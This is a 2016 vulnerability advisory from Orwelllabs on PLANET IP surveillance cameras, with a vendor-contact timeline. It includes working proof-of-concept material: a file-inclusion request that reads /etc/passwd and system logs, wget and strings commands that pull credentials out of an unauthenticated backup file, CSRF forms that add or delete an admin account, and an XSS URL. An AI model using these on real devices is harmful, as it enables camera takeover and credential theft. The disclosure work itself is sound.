PLANET Technology IP Surveillance Cameras - Multiple Vulnera

1. _ _ _ _
2. | | | | | |
3. ___ _ ____ _____| | | | __ _| |__ ___
4. / _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|
5. | (_) | | \ V V / __/ | | | (_| | |_) \__ \
6. \___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/
7.  
8. Security Adivisory
9. 2016-04-06 www.orwelllabs.com
10. Twitter:@orwelllabs
11.  
12. mantra: ...not affect a product that is in scope for... AhHum!
13.  
14.  
15.  
16. Overview
17. ========
18. Technical Risk: high
19. Likelihood of Exploitation: medium
20. Credits: Discovered and researched by Orwelllabs
21. CVE-Number: N/A
22. DWF: Submited
23. Adivisory URL:
24. http://www.orwelllabs.com/2016/02/planet-ip-surveillance-camera-local.html
25. [1]
26.  
27.  
28. Issues
29. =====
30. I. Local File Inclusion (42 vectors)
31. II. Arbitrary file read/Authentication bypass
32. III. Sensitive information disclosure
33. IV. Cross-site request forgery
34. V. Reflected Cross-site scripting
35. VI. hardcoded credentials
36.  
37.  
38. I. Local File Inclusion
39. =======================
40. * CLASS: External Control of File Name or Path [CWE-73]
41.  
42. The Web Management interface of PLANET IP surveillance Cams models
43. FW-ICA-2500,
44. ICA-2250VT, ICA-4200V, ICA-4500V, ICA-3350V, ICA-5350V AND ICA-8350 and
45. probably
46. others is prone to Local File Include (LFI).
47.  
48.  
49. PoC
50. ---
51. The request bellow is generated when a new user is added, in this case
52. we are adding the following administrative credential for the cam:
53. "root:r00tx".
54.  
55. GET /cgi-bin/admin/querylogin.cgi HTTP/1.1
56. Host: {xxx.xxx.xxx.xxx}
57. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101
58. Firefox/42.0
59. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
60. Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
61. Accept-Encoding: gzip, deflate
62. Referer: http://
63. {xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp
64. Cookie: ipcam_profile=1; tour_index=-1; IsHideStreamingStatus=yes
65. Authorization: Basic YdRRtXW41YXRtad4=
66. Connection: keep-alive
67. If-Modified-Since: Mon, 08 Jul 2013 11:10:26 GMT
68.  
69.  
70. If the value of the parameter "redirect" was changed to any system file
71. will return the contents of that file, as shown below:
72. http://
73. {xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=/etc/passwd
74.  
75. In this case will retrieved the content of /etc/passwd
76.  
77. Vectors:
78. -------
79. There are a total of 42 vectors of LFI, the detailed results will be
80. published in www.orwelllabs.com [1] soon.
81. Basically all menus of the camera (shown below) to submit, add, modify and
82. remove settings trigger the corresponding
83. scripts to access resource that contains a parameter "redirect" which is
84. also affected.
85.  
86. [ ----------------------------]
87. [ #1: Network ---------------] -> 9
88. [ #2: Camera ---------------] -> 3
89. [ #3: System -------------- ] -> 2
90. [ #4: Video -------------- ] -> 4
91. [ #5: Audio -------------- ] -> 1
92. [ #6: User -------------- ] -> 1
93. [ #7: Protocol ------------- ] -> 2
94. [ #8: E-Mail -------------- ] -> 1
95. [ #9: Event Detection ------ ] -> 1
96. [ #10: Storage -------------- ] -> 2
97. [ #11: Continuous Recording - ] -> 1
98. [ #12: Recording List ------- ] -> 0
99. [ #13: Event Server --------- ] -> 11
100. [ #14: Event Schedule ------- ] -> 4
101. [ ----------+--------------- ]
102.  
103.  
104.  
105. II. Arbitrary file read/Authentication bypass
106. =============================================
107. The camera offers a feature to perform the download settings via a backup
108. file. However,
109. (how acess control is not effective) this file remains accessible via the
110. browser for an unauthenticated user.
111.  
112. PoC
113. ---
114. wget --no-check-certificate https://{xxx.xxx.xxx.xxx}/backup.tar.gz
115. tar -xzvf backup.tar.gz
116. cat tmp/sysConfig/sysenv.cfg|strings|fmt|cut -f8,9 -d" "
117.  
118. It will return the credential to access the camera
119.  
120. Through this vulnerability a user can also obtain the credential of the AP
121. to which the camera is connected just parsing
122. the file: 'tmp/sysConfig/extra.info'
123.  
124.  
125. III. Sensitive information disclosure
126. =====================================
127. Using LFI vulnerability report, a user can obtain sensitive information
128. such as username and password by reading the log file, as follows:
129.  
130. {xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=&pwd=&grp=&sgrp=&action=&redirect=/var/log/messages
131.  
132.  
133. IV. Cross-site request forgery
134. ==============================
135. Planet IP cams ICA-* are prone to Multple CSRF.
136.  
137. PoC
138. ------
139.  
140. - This will create a admin credential: root:r00tx
141.  
142. <html>
143. <!-- CSRF PoC - -->
144. <body>
145. <form action="http://
146. {xxx.xxx.xxx.xxx}/setup.cgi?language=ie&adduser=root:r00tx:1">
147. <input type="submit" value="Submit form" />
148. </form>
149. </body>
150. </html>
151.  
152. - ICA-5350V
153.  
154. <html>
155. <!-- CSRF PoC -->
156. <body>
157. <form action="http://
158. {xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp">
159. <input type="submit" value="Submit form" />
160. </form>
161. </body>
162. </html>
163.  
164. - Del user root
165.  
166. <html>
167. <!-- CSRF PoC -->
168. <body>
169. <form action="http://
170. {xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=remove&redirect=asp%2Fuser.asp">
171. <input type="submit" value="Submit form" />
172. </form>
173. </body>
174. </html>
175.  
176.  
177. V. Cross-Site Scripting
178. =======================
179. Cams models ICA-* are prone to Multiple XSS
180.  
181. POC
182. -------
183. http://{xxx.xxx.xxx.xxx}/setup.cgi?<script>alert("XSS")</script>
184.  
185. this will pop-up the message XSS in the browser
186.  
187.  
188. VI. hardcoded credentials
189. =========================
190.  
191. The credentials of web management can be found just viewing the source of
192. page default_nets.htm:
193.  
194. POC
195. ------
196. https://{xxx.xxx.xxx.xxx}/default_nets.htm
197.  
198. code:
199.  
200. }
201.  
202. function av_onload(){
203. CheckMobileMode();
204. util_SetUserInfo();
205. Loadplay();
206. watchdog();
207. //alert("watchdog");
208. }
209. function Loadplay(){
210. play("MasterUsr","MasterPwd","554",parseInt("99"),parseInt("99"),"1",parseInt("2"),parseInt("0"),"192.168.1.99","");
211. }
212.  
213.  
214. Vulnerable Packages
215. ===================
216. ICA-2500
217. ICA-2250VT
218. ICA-4200V
219. ICA-4500V
220. ICA-3350V
221. ICA-5350V
222. ICA-8350
223.  
224.  
225.  
226. Timeline
227. ========
228. 2015-10-02 - Issues discovered
229. 2015-11-30 - Vendor contacted (advisore sent)
230. 2015-12-16 - Vendor contacted (asking for feedback about reported issues)
231. 2015-12-17 - Vendor response (asking for more time to check issues)
232. 2015-12-21 - RD team replied: can't duplicate vulnerabilities....
233. 2016-01-13 - Vendor contacted (submitted evidence that the vulnerabilities
234. persist and can be reproduced.)
235. ...and no news after that...